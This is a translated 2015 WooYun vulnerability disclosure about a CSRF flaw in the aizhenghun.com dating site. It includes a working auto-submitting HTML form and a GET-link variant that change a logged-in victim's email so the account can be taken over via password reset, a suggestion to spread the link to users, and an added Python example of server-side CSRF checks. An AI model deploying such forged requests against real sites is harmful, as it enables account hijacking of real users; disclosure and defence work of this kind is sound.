Vulnerability summary (followers: 24)
Defect ID: wooyun-2015-0127561
Title: CSRF vulnerability in Aizhenghun allows personal information to be tampered with
Vendor: aizhenghun.com
Author: 路人甲
Submitted: 2015-07-20 15:49
Fix time: 2015-07-25 15:50
Disclosed: 2015-07-25 15:50
Vulnerability type: CSRF
Severity: High
Self-assessed Rank: 15
Status: vendor was notified of the vulnerability but ignored it
Source: http://www.wooyun.org; for questions or help contact [email protected]
Tags: none
Vulnerability details
Disclosure status:
2015-07-20: details sent to the vendor, awaiting vendor handling
2015-07-25: vendor proactively ignored the vulnerability; details disclosed to the public
Brief description:
A CSRF vulnerability in Aizhenghun allows a user's personal information to be tampered with; once the email address has been changed, the account can be reset through that email address.
Small vendors are so painful to deal with.
Detailed description:
POC
<html>
  <body>
    <!-- Cross-site POST to the profile update handler; the victim's browser attaches its session cookie -->
    <form action="http://www.aizhenghun.com/register_Upd.asp" method="POST">
      <input type="hidden" name="steps" value="1" />
      <input type="hidden" name="nickname" value="123" />
      <input type="hidden" name="email" value="service999@qq.com" />
      <input type="hidden" name="marriage1" value="1" />
      <input type="hidden" name="height" value="175" />
      <input type="hidden" name="salary" value="9" />
      <input type="hidden" name="year" value="1996" />
      <input type="hidden" name="month" value="1" />
      <input type="hidden" name="days" value="2" />
      <input type="hidden" name="province" value="10102000" />
      <input type="hidden" name="city" value="-1" />
      <input type="hidden" name="education1" value="3" />
      <input type="hidden" name="children1" value="-1" />
      <input type="hidden" name="house" value="-1" />
      <input type="hidden" name="age1" value="19" />
      <input type="hidden" name="age2" value="25" />
      <input type="hidden" name="workProvince" value="-1" />
      <input type="hidden" name="workCity" value="-1" />
      <input type="hidden" name="marriage2" value="-1" />
      <input type="hidden" name="education2" value="-1" />
      <input type="hidden" name="salary1" value="-1" />
      <input type="hidden" name="children2" value="-1" />
      <input type="hidden" name="height1" value="-1" />
      <input type="hidden" name="height2" value="-1" />
      <input type="hidden" name="hasphoto" value="1" />
      <input type="hidden" name="nature2" value="-1" />
      <input type="hidden" name="body2" value="-1" />
      <input type="hidden" name="weight1" value="-1" />
      <input type="hidden" name="weight2" value="-1" />
      <input type="hidden" name="occupation2" value="-1" />
      <input type="hidden" name="stock2" value="-1" />
      <input type="hidden" name="wantchildren2" value="-1" />
      <input type="hidden" name="hometownProvince2" value="-1" />
      <input type="hidden" name="hometownCity2" value="-1" />
      <input type="hidden" name="issmoking" value="-1" />
      <input type="hidden" name="isdrinking" value="-1" />
      <!-- The original introduce value was unrecoverable mojibake and its closing quote was missing,
           which swallowed the following markup; replaced with a placeholder and properly closed -->
      <input type="hidden" name="introduce" value="PLACEHOLDER_INTRODUCE" />
      <input type="hidden" name="hobby" value="" />
      <input type="hidden" name="pastime" value="" />
      <input type="hidden" name="live" value="" />
      <input type="hidden" name="nature" value="" />
      <!-- GBK-encoded "提交" (Submit), shown as mojibake in the original -->
      <input type="hidden" name="issubmit" value="提交" />
      <input type="hidden" name="actio" value="1" />
      <!-- Auto-submit as soon as the page loads -->
      <script>
        document.forms[0].submit();
      </script>
    </form>
  </body>
</html>
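The handler the POC targets accepts any request that carries the victim's session cookie, whether it arrives as a cross-site POST (the form above) or as a plain GET link (the variant further down). The following is an added example, not the reporter's code and not the vendor's ASP implementation, showing the server-side checks that defeat both variants: a synchronizer token bound to the session, an Origin/Referer host check, and a POST-only rule for state changes. The endpoint name register_Upd.asp and the form field names come from the report; the session store, the csrf_token field name, the third-party host and the sample requests are constructed for illustration.

```python
"""Server-side CSRF defence for a state-changing profile-update handler.

Added example; not part of the original WooYun report and not the vendor's code.
"""
import hmac
import secrets
from typing import Dict, Optional, Tuple
from urllib.parse import urlsplit

SITE_HOST = "www.aizhenghun.com"  # host that serves the real profile form (from the report)

# Constructed in-memory session store: session id -> per-session CSRF token.
SESSIONS: Dict[str, str] = {}


def issue_csrf_token(session_id: str) -> str:
    """Create (or reuse) a per-session synchronizer token. The real form embeds it as a
    hidden field; a third-party page cannot read it, so the POC cannot supply it."""
    if session_id not in SESSIONS:
        SESSIONS[session_id] = secrets.token_urlsafe(32)
    return SESSIONS[session_id]


def _source_host(headers: Dict[str, str]) -> Optional[str]:
    """Host the browser says the request came from: Origin first, then Referer."""
    for name in ("Origin", "Referer"):
        value = headers.get(name)
        if value:
            return urlsplit(value).hostname
    return None


def check_profile_update(method: str, headers: Dict[str, str],
                         form: Dict[str, str], session_id: str) -> Tuple[bool, str]:
    """Decide whether a request to register_Upd.asp may change the profile.
    Returns (allowed, reason). Any one rule blocks the report's POC; together they
    also block the GET-link variant and requests with a stripped Referer."""
    # 1. State changes only over POST, so a crafted GET link does nothing.
    if method.upper() != "POST":
        return False, "state change requires POST"
    # 2. The request must come from our own host. A cross-site form post carries the
    #    hosting page's Origin; a missing header is treated as untrusted.
    src = _source_host(headers)
    if src != SITE_HOST:
        return False, "unexpected request source: %r" % (src,)
    # 3. The submitted token must match the session's token (constant-time compare).
    expected = SESSIONS.get(session_id, "")
    supplied = form.get("csrf_token", "")
    if not expected or not hmac.compare_digest(expected.encode("utf-8"), supplied.encode("utf-8")):
        return False, "missing or invalid csrf_token"
    return True, "ok"


def demo() -> Dict[str, Tuple[bool, str]]:
    """Run three constructed requests through the check and return the verdicts."""
    sid = "sess-victim"  # constructed session id for the logged-in victim
    token = issue_csrf_token(sid)
    # A subset of the fields from the report's POC; it carries no token because a
    # third-party page has no way to read one.
    poc_form = {"steps": "1", "nickname": "123", "email": "service999@qq.com", "actio": "1"}
    third_party = "http://third-party.example"  # constructed host serving the POC page
    return {
        # (a) the auto-submitting form from the report, loaded from a third-party page
        "poc_post": check_profile_update("POST", {"Origin": third_party}, poc_form, sid),
        # (b) the GET-link variant from the report
        "poc_get": check_profile_update("GET", {"Referer": third_party + "/x.html"}, poc_form, sid),
        # (c) a legitimate submission from the site's own profile form
        "legit": check_profile_update("POST", {"Origin": "http://" + SITE_HOST},
                                      dict(poc_form, csrf_token=token), sid),
    }


if __name__ == "__main__":
    for name, (allowed, reason) in demo().items():
        print("%-9s allowed=%-5s %s" % (name, allowed, reason))
```

The token check alone is sufficient against the POC as written; the Origin/Referer and POST-only rules are defence in depth for handlers that were never given a token field, which is the state register_Upd.asp is in according to the report.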
Proof of vulnerability:
Observed that the nickname "123" and these fields cannot be modified.
But with the POC we constructed they can be modified; the nickname can even be set to "1".
The password can then be recovered through the email address; this is not demonstrated here.
Exploitation method: join a group and send it to users.
Or alternatively:
http://www.aizhenghun.com/register_Upd.asp?steps=1&nickname=%B0%A1%CA%B5%B4%F2%CA%B5%B4%F3%B5%C4&email=service%40qq.com&marriage1=1&height=175&salary=9&year=1996&month=1&days=2&province=10102000&city=-1&education1=3&children1=-1&house=-1&age1=19&age2=25&workProvince=-1&workCity=-1&marriage2=-1&education2=-1&salary1=-1&children2=-1&height1=-1&height2=-1&hasphoto=1&nature2=-1&body2=-1&weight1=-1&weight2=-1&occupation2=-1&stock2=-1&wantchildren2=-1&hometownProvince2=-1&hometownCity2=-1&issmoking=-1&isdrinking=-1&introduce=%EF%BF%3F%23162%3B%26%23180%3B%E8%9F%AE%E5%26%2359330%3B%EF%BF%3F%23180%3B%E7%AC%95%EF%BF%BD%23182%3B%26%23165%3B%26%23182%3B%26%23165%3B%A1%E3%26%23180%3B%EF%BF%3F%23177%3B%26%23180%3B%EF%BF%3F%23180%3B%EF%BF%3F%23176%3B%26%23161%3B%E9%A3%92%E9%A3%92%A1%E3%26%23161%3B%A1%E3%26%23161%3B%A1%E3%26%23161%3B%E5%AE%3F%26%23180%3B%E8%9A%B4%EF%BF%BD%23180%3B%E8%9F%AE%EF%BF%BD%23182%3B%EF%BF%3F+%2F%3E%0D%0A++++++%3Cinput+type%3D&hobby=&pastime=&live=&nature=&issubmit=%CC%E1%BD%BB&actio=1
Change the contents of the link a little, copy and paste, and it works again.
I think the only fun part is the nickname; you can even get a blank nickname.
Fix recommendation:
Could the vendor be a little generous? Is there a gift?
Finding vulnerabilities isn't easy; helping vendors is my responsibility.
Copyright notice: when reposting, please credit the source: 路人甲@WooYun
Vulnerability response
Vendor response:
Severity: no impact, vendor ignored
Ignored at: 2015-07-25 15:50
Vendor reply:
Vulnerability Rank: 4 (WooYun rating)
Latest status:
None yet